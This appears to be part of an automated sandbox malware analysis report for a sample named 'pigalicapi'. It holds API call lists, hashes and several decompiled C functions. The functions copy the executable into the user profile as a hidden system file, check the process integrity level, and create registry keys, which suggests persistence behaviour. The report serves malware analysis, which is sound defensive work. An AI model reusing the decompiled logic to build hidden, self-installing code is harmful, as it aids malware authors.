                                                                                                                                                                                                                                                                            0x01175896
                                                                                                                                                                                                                                                                            0x0117589c
                                                                                                                                                                                                                                                                            0x011758a9
                                                                                                                                                                                                                                                                            0x011758ab
                                                                                                                                                                                                                                                                            0x011758d0
                                                                                                                                                                                                                                                                            0x011758e2
                                                                                                                                                                                                                                                                            0x01175912
                                                                                                                                                                                                                                                                            0x011758e4
                                                                                                                                                                                                                                                                            0x011758ed
                                                                                                                                                                                                                                                                            0x011758fc
                                                                                                                                                                                                                                                                            0x011758fc
                                                                                                                                                                                                                                                                            0x011758e2
                                                                                                                                                                                                                                                                            0x011758a9
                                                                                                                                                                                                                                                                            0x0117591c
                                                                                                                                                                                                                                                                            0x0117591c
                                                                                                                                                                                                                                                                            0x01175922
                                                                                                                                                                                                                                                                            0x01175922
                                                                                                                                                                                                                                                                            0x0117592c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: GetVersionExA.KERNEL32(0000009C), ref: 01178FF7
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: GetSystemInfo.KERNEL32(?), ref: 01179009
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0117902E
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrcatA.KERNEL32(00000000,_x64), ref: 01179222
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrlenA.KERNEL32(?), ref: 0117922F
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrcatA.KERNEL32(00000000,0117C980), ref: 01179242
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrcatA.KERNEL32(00000000,?), ref: 01179253
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrlenA.KERNEL32(00000000), ref: 0117925D
                                                                                                                                                                                                                                                                              • Part of subcall function 01178F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 01179275
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 01175742
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01171CB1
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: Process32First.KERNEL32(000000FF,00000128), ref: 01171CE1
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: GetCurrentProcessId.KERNEL32 ref: 01171CEE
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: Process32First.KERNEL32(000000FF,00000128), ref: 01171D52
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 01171D78
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 01171D92
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 01171DA6
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 01171DDC
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0117575B,00000000,?,00000004,00000000), ref: 01171DFB
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0117575B,00000000,?,00000004,00000000), ref: 01171E21
                                                                                                                                                                                                                                                                              • Part of subcall function 01171CA0: CloseHandle.KERNEL32(000000FF), ref: 01171E4B
                                                                                                                                                                                                                                                                              • Part of subcall function 01179D20: GetSystemDirectoryA.KERNEL32 ref: 01179D9A
                                                                                                                                                                                                                                                                              • Part of subcall function 01179D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 01179DDD
                                                                                                                                                                                                                                                                              • Part of subcall function 01179D20: StringFromCLSID.OLE32(00000020,?), ref: 01179EF7
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: lstrlenA.KERNEL32(00000000), ref: 01175CEB
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01175D10
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 01175D29
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01175D45
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 01175D6D
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01175D99
                                                                                                                                                                                                                                                                              • Part of subcall function 01175CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 01175DA3
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 011757B8
                                                                                                                                                                                                                                                                            • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 011757F1
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0117580A
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 0117582F
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01175854
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 0117586D
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01175896
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 011758D0
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01175912
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0117591C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 1116761331-4090404022
                                                                                                                                                                                                                                                                            • Opcode ID: 595663646be978b69069c45135f07054ed8c843e0ee281d1bec2cafc6d25e446
                                                                                                                                                                                                                                                                            • Instruction ID: 4c59af8f563b90720184287c5799e862c2999bfe6af7f675c46a123a9158f1bd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 595663646be978b69069c45135f07054ed8c843e0ee281d1bec2cafc6d25e446
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 145194B4940209BBEB18DFA4DC59FEE7B35AB44705F048168F6196A3C1D774A680CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 592 1171120-1171134 593 11712bb-11712c1 592->593 594 117113a-117113e 592->594 594->593 595 1171144-1171150 lstrlenA 594->595 595->593 596 1171156-1171162 lstrlenA 595->596 596->593 597 1171168-1171175 596->597 598 1171177-1171188 GetAllUsersProfileDirectoryA 597->598 599 117118a-117119b GetEnvironmentVariableA 597->599 600 11711a1-11711d9 wnsprintfA lstrcmpiA 598->600 599->600 601 1171216-1171287 call 11797a0 lstrcpyA * 2 CreateThread 600->601 602 11711db-11711e1 600->602 606 11712a3-11712b8 call 11797c0 601->606 607 1171289-117128d 601->607 602->601 603 11711e3-1171210 CopyFileA SetFileAttributesA lstrcpyA 602->603 603->601 606->593 608 117128f-1171298 607->608 609 117129a-11712a1 607->609 608->609 609->593
                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E01171120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                                                            				void* _v288;
                                                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                                                            				void* _v560;
                                                                                                                                                                                                                                                                            				void* _v564;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x104;
                                                                                                                                                                                                                                                                            					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                            					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                                            						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                                            						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v560 = E011797A0(0x30d);
                                                                                                                                                                                                                                                                            					_v16 = _v560;
                                                                                                                                                                                                                                                                            					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                            					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                            					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                            					_t58 = CreateThread(0, 0, E011712D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                            					_v288 = _t58;
                                                                                                                                                                                                                                                                            					if(_v288 == 0) {
                                                                                                                                                                                                                                                                            						_v564 = _v16;
                                                                                                                                                                                                                                                                            						E011797C0(_v564);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						if(_a20 != 0) {
                                                                                                                                                                                                                                                                            							 *_a20 = _v288;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x01171129
                                                                                                                                                                                                                                                                            0x01171134
                                                                                                                                                                                                                                                                            0x01171168
                                                                                                                                                                                                                                                                            0x01171175
                                                                                                                                                                                                                                                                            0x0117119b
                                                                                                                                                                                                                                                                            0x01171177
                                                                                                                                                                                                                                                                            0x01171182
                                                                                                                                                                                                                                                                            0x01171182
                                                                                                                                                                                                                                                                            0x011711bd
                                                                                                                                                                                                                                                                            0x011711d9
                                                                                                                                                                                                                                                                            0x011711f0
                                                                                                                                                                                                                                                                            0x011711ff
                                                                                                                                                                                                                                                                            0x01171210
                                                                                                                                                                                                                                                                            0x01171210
                                                                                                                                                                                                                                                                            0x01171223
                                                                                                                                                                                                                                                                            0x0117122f
                                                                                                                                                                                                                                                                            0x01171238
                                                                                                                                                                                                                                                                            0x01171249
                                                                                                                                                                                                                                                                            0x0117125d
                                                                                                                                                                                                                                                                            0x01171274
                                                                                                                                                                                                                                                                            0x0117127a
                                                                                                                                                                                                                                                                            0x01171287
                                                                                                                                                                                                                                                                            0x011712a6
                                                                                                                                                                                                                                                                            0x011712b3
                                                                                                                                                                                                                                                                            0x01171289
                                                                                                                                                                                                                                                                            0x0117128d
                                                                                                                                                                                                                                                                            0x01171298
                                                                                                                                                                                                                                                                            0x01171298
                                                                                                                                                                                                                                                                            0x0117129a
                                                                                                                                                                                                                                                                            0x0117129a
                                                                                                                                                                                                                                                                            0x01171287
                                                                                                                                                                                                                                                                            0x011712c1

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01171148
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0117115A
                                                                                                                                                                                                                                                                            • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 01171182
                                                                                                                                                                                                                                                                              • Part of subcall function 011797C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011797CF
                                                                                                                                                                                                                                                                              • Part of subcall function 011797C0: RtlFreeHeap.NTDLL(00000000), ref: 011797D6
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0117119B
                                                                                                                                                                                                                                                                            • wnsprintfA.SHLWAPI ref: 011711BD
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000104,?), ref: 011711D1
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000104,?,00000000), ref: 011711F0
                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000006), ref: 011711FF
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000104,?), ref: 01171210
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 01171249
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0117125D
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 01171274
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                            • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                            • Opcode ID: f6d6c60dec0a1e464215568ea6a395a78392a71b37d433b19592034aa17fc883
                                                                                                                                                                                                                                                                            • Instruction ID: 9ff396866d7037029b5369e0bb778e7d7ac2d00bdb643a6ba1de71fa01029870
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6d6c60dec0a1e464215568ea6a395a78392a71b37d433b19592034aa17fc883
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0412EB5900209BBDB28CFA4D889BDE7BB8BB49705F108198EA1996384D774D784CFD0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                                                                            			E011799F0() {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				char _v1044;
                                                                                                                                                                                                                                                                            				char _v2068;
                                                                                                                                                                                                                                                                            				long _v2072;
                                                                                                                                                                                                                                                                            				void* _v2076;
                                                                                                                                                                                                                                                                            				void* _v2080;
                                                                                                                                                                                                                                                                            				char _v2084;
                                                                                                                                                                                                                                                                            				int _t43;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				_v8 = 0x400;
                                                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					return _v9;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v2072 = 0;
                                                                                                                                                                                                                                                                            				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                            				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                                            					CloseHandle(_v16);
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                            				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                            				if(_t43 == 0) {
                                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                            				_v2084 = 0x44;
                                                                                                                                                                                                                                                                            				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                            							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x011799f9
                                                                                                                                                                                                                                                                            0x011799fd
                                                                                                                                                                                                                                                                            0x01179a19
                                                                                                                                                                                                                                                                            0x01179b80
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179b80
                                                                                                                                                                                                                                                                            0x01179a1f
                                                                                                                                                                                                                                                                            0x01179a3a
                                                                                                                                                                                                                                                                            0x01179a4a
                                                                                                                                                                                                                                                                            0x01179b76
                                                                                                                                                                                                                                                                            0x01179b7a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179b7a
                                                                                                                                                                                                                                                                            0x01179a56
                                                                                                                                                                                                                                                                            0x01179a77
                                                                                                                                                                                                                                                                            0x01179a7f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179a8b
                                                                                                                                                                                                                                                                            0x01179a91
                                                                                                                                                                                                                                                                            0x01179aad
                                                                                                                                                                                                                                                                            0x01179acb
                                                                                                                                                                                                                                                                            0x01179ae6
                                                                                                                                                                                                                                                                            0x01179b04
                                                                                                                                                                                                                                                                            0x01179b1c
                                                                                                                                                                                                                                                                            0x01179b3a
                                                                                                                                                                                                                                                                            0x01179b52
                                                                                                                                                                                                                                                                            0x01179b70
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179b72
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179b3c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01179b06
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 01179A0A
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 01179A11
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 01179A3A
                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 01179A77
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 01179AAD
                                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(?,00000000), ref: 01179AC3
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 01179AE6
                                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(?), ref: 01179AFC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01179B7A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: 332c9d5650e274bfaa6d3e4ffd4d971953be4156ccc6fdd201cfe59f0ca561b5
                                                                                                                                                                                                                                                                            • Instruction ID: 6330601d2621e5f081ec861754e1ddae78989ba3a1a39d221d197fd62f977d83
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 332c9d5650e274bfaa6d3e4ffd4d971953be4156ccc6fdd201cfe59f0ca561b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF411F75A4021C9BDB28CB54CC45FEAB7BCBF49704F00C1E4A65997284DB709A86CFE1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01175A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                                            				CHAR* _t35;
                                                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                                                            				long _t43;
                                                                                                                                                                                                                                                                            				CHAR* _t51;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                            					E01177D20(_t27, "Qawoqmsckgkay", 0, 0xe);
                                                                                                                                                                                                                                                                            					lstrcpyA("Qawoqmsckgkay", "WDefault");
                                                                                                                                                                                                                                                                            					_t33 = E01175930(_a4 + 0x45b, "Qawoqmsckgkay", 0xd); // executed
                                                                                                                                                                                                                                                                            					E01177D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                            					_t35 =  *0x118189c; // 0x117c4e0
                                                                                                                                                                                                                                                                            					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                            						_t51 =  *0x118189c; // 0x117c4e0
                                                                                                                                                                                                                                                                            						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                            						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                            						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a8, "Qawoqmsckgkay");
                                                                                                                                                                                                                                                                            							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            							_v16 = 0;
                                                                                                                                                                                                                                                                            							_v20 = 0;
                                                                                                                                                                                                                                                                            							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                            							if(_t43 != 0) {
                                                                                                                                                                                                                                                                            								E01177D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                            								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x01175a07
                                                                                                                                                                                                                                                                            0x01175a12
                                                                                                                                                                                                                                                                            0x01175a35
                                                                                                                                                                                                                                                                            0x01175a47
                                                                                                                                                                                                                                                                            0x01175a5d
                                                                                                                                                                                                                                                                            0x01175a6f
                                                                                                                                                                                                                                                                            0x01175a77
                                                                                                                                                                                                                                                                            0x01175a86
                                                                                                                                                                                                                                                                            0x01175a8c
                                                                                                                                                                                                                                                                            0x01175a97
                                                                                                                                                                                                                                                                            0x01175aa1
                                                                                                                                                                                                                                                                            0x01175ab9
                                                                                                                                                                                                                                                                            0x01175ac8
                                                                                                                                                                                                                                                                            0x01175ace
                                                                                                                                                                                                                                                                            0x01175ad5
                                                                                                                                                                                                                                                                            0x01175adc
                                                                                                                                                                                                                                                                            0x01175b00
                                                                                                                                                                                                                                                                            0x01175b08
                                                                                                                                                                                                                                                                            0x01175b20
                                                                                                                                                                                                                                                                            0x01175b31
                                                                                                                                                                                                                                                                            0x01175b0a
                                                                                                                                                                                                                                                                            0x01175b0e
                                                                                                                                                                                                                                                                            0x01175b0e
                                                                                                                                                                                                                                                                            0x01175b41
                                                                                                                                                                                                                                                                            0x01175b41
                                                                                                                                                                                                                                                                            0x01175ab9
                                                                                                                                                                                                                                                                            0x01175a86
                                                                                                                                                                                                                                                                            0x01175b4b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(Qawoqmsckgkay,WDefault), ref: 01175A47
                                                                                                                                                                                                                                                                              • Part of subcall function 01175930: CharUpperA.USER32(00000000), ref: 011759E2
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(0117C4E0), ref: 01175A7D
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,0117C4E0), ref: 01175A97
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01175AA1
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(Qawoqmsckgkay), ref: 01175AAE
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Qawoqmsckgkay), ref: 01175AC8
                                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 01175B00
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01175B0E
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 01175B31
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01175B3B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                            • String ID: Qawoqmsckgkay$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                            • API String ID: 4161867159-3577274092
